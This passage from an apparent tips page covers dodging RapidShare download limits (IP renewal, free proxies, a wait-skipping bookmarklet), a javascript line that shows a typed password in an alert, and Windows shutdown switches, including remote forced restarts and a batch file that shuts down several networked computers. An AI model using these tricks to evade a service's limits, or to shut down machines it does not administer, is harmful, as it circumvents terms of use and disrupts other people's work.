Frequently you will be assigned a new IP address when this happens.
Sometime you will, sometimes you will not. If you are on a fixed IP address, this method will not work.
If this works for you, you may want to save the above commands into a batch file, and just run it when you need it.

C] Use a proxy with SwitchProxy and Firefox:
1) Download and install Firefox
2) Download and install SwitchProxy
3) Google for free proxies
4) When you hit your download limit, clean your cookies and change your proxy

D] You can use a bookmarklet to stop your wait times:
1) Open IE
2) Right Click On This Link
3) Select Add to Favorites
4) Select Yes to the warning that the bookmark may be unsafe.
5) Name it “RapidShare No Wait”
6) Click on the Links folder (if you want to display it in your IE toolbar)
7) Click OK
8) You may need to close and reopen IE to see it
9) Goto rapidshare and click the bookmarklet when you are forced to wait

Reveal Passwords Using Javascript

Want to Reveal the Passwords Hidden Behind Asterisk (****) ?
Follow the steps given below-

1) Open the Login Page of any website. (eg. http://mail.yahoo.com)

2) Type your 'Username' and 'Password'.

3) Copy and paste the javascript code given below into your browser's address bar and press 'Enter'.

javascript: alert(document.getElementById('Passwd').value);


4) As soon as you press 'Enter', A window pops up showing Password typed by you..!


Note :- This trick may not be working with firefox.

Shutdown Command Via Command Prompt

The 'Shutdown' Command Becomes More Flexible and Automated when used from the Command Prompt.
To Run the 'Shutdown' command from the command prompt, go to 'Start > Run', type 'cmd', and press 'Enter'.
In the black box (the command prompt) type 'Shutdown' and the Switches you want to use with the 'Shutdown' command.
You have to use at least one switch for the shutdown command to work.

The Switches :-
The 'Shutdown' command has a few options called Switches. You can always see them by typing 'shutdown -?' in the command prompt if you forget any of them.

-i: Display GUI interface, must be the first option
-l: Log off (cannot be used with -m option)
-s: Shutdown the computer
-r: Shutdown and restart the computer
-a: Abort a system shutdown
-m \\computername: Remote computer to shutdown/restart/abort
-t xx: Set timeout for shutdown to xx seconds
-c “comment”: Shutdown comment (maximum of 127 characters)
-f: Forces running applications to close without warning
-d [u][p]:xx:yy: The reason code for the shutdown u is the user code p is a planned shutdown code xx is the major reason code (positive integer less than 256) yy is the minor reason code (positive integer less than 65536)

Note :- I’ve noticed using a switch with a '-' sign doesn’t work sometimes.
If you are having trouble try using a '/' in place of '-' in your switches.

Examples :-
shutdown –m \\computername –r –f
This command will restart the computer named computername and force any programs that might still be running to stop.

shutdown –m \\computername –r –f –c “I’m restarting your computer. Please save your work now.” –t 120
This command will restart the computer named computername, force any programs that might still be running to stop, give to user on that computer a message, and countdown 120 seconds before it restarts.

shutdown –m \\computername –a
This command will abort a previous shutdown command that is in progress.

Using A Batch File :-
You can create a file that performs the shutdown command on many computers at one time.

In this example I’m going to create a batch file that will use the shutdown command to shut down 3 computers on my home network before I go to bed.

Open 'Notepad' and type the shutdown command to shut down a computer for each computer on the network.
Make sure each shutdown command is on its own line.
An example of what should be typed in notepad is given below-

shutdown –m \\computer1 –s
shutdown –m \\computer2 –s
shutdown –m \\computer3 -s

Now I’ll save it as a batch file by going to file, save as, change save as type to all files, give the file a name ending with '.bat'. I named mine 'shutdown.bat'.
Pick the location to save the batch file in and save it.

When you run the batch file it’ll shutdown computer 1, 2, and 3 for you.

You can use any combination of shutdown commands in a batch file.